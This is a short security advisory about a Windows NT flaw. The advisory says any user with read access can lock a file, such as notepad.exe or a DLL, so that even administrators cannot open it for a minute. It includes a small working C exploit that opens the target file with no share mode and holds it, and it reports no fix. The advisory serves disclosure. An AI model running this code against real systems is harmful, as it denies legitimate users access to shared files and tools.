COMMAND

    locking stuff

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Paul Ashton  discovered that  the following  trivial program  will
    deny access  to any  particular file  that a  user has read access
    to.   For  example,  run:   lock  \winnt\system32\notepad.exe, and
    then  for  the  following  minute  nobody  will  be  able to start
    notepad.   This  also  works  over  shares  and  for  dlls;   lock
    system32\ureg.dll will prevent anyone from starting regedt32.

    There is seriously doubt whether guest should have the ability  to
    prevent administrators  from starting  msword on  a shared  drive,
    etc.  Just imagine a  virus that wanders round locking  everything
    in sight.  Exploit follows:

    #include <windows.h>

    void
    main(int ac, char *av[])
    {
      HANDLE fp;

      fp = CreateFile(av[1], FILE_READ_DATA, 0, 0, OPEN_EXISTING, 0, 0);

      if (fp == INVALID_HANDLE_VALUE)
        exit(GetLastError());

      Sleep(60000);
      exit(0);
    }

SOLUTION

    Nothing yet.